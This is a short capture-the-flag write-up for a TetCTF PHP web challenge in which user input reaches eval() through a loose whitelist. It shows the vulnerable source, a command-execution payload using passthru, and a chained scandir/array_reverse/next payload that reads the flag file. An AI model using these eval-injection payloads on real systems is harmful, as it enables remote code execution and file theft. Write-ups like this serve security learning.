This is the snippet of the source that we're interested in ```php if(!isset($_GET["roll"])) { show_source(__FILE__); } else { $wl = preg_match('/^[a-z\(\)\_\.]+$/i', $_GET["roll"]); if($wl === 0 || strlen($_GET["roll"]) > 50) { die("bumbadum badum"); } eval("echo ".$_GET["roll"]."();"); } ``` Using the `roll` parameter we can call php functions. For example `?roll=passthru(ls)` gives us ``` fl4g_here_but_can_you_get_it_hohoho.php index.php ``` We can read the flag file by constructing a chain of php functions. here's the working payload `?roll=show_source(next(array_reverse(scandir(__DIR__))))` Let's break this down starting with `scandir` `scandir` returns an array containing all files and directories in alphabetical order including `.` and `..` In the case of the challenge that means [0] is `.` and [3] is `index.php` by calling `array_reverse` on `scandir` it does just that, so now [0] is `index.php` and then, by calling `next` on the reversed scandir, we're moving the internal pointer by 1 so it's on [1] instead of [0], kicking back the `fl4g..` file. ```php <?php $flagsssssssss = "TetCTF{lixi_50k_<3_vina_*100*25926415724382#}"; ?> ``` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #php #web Related: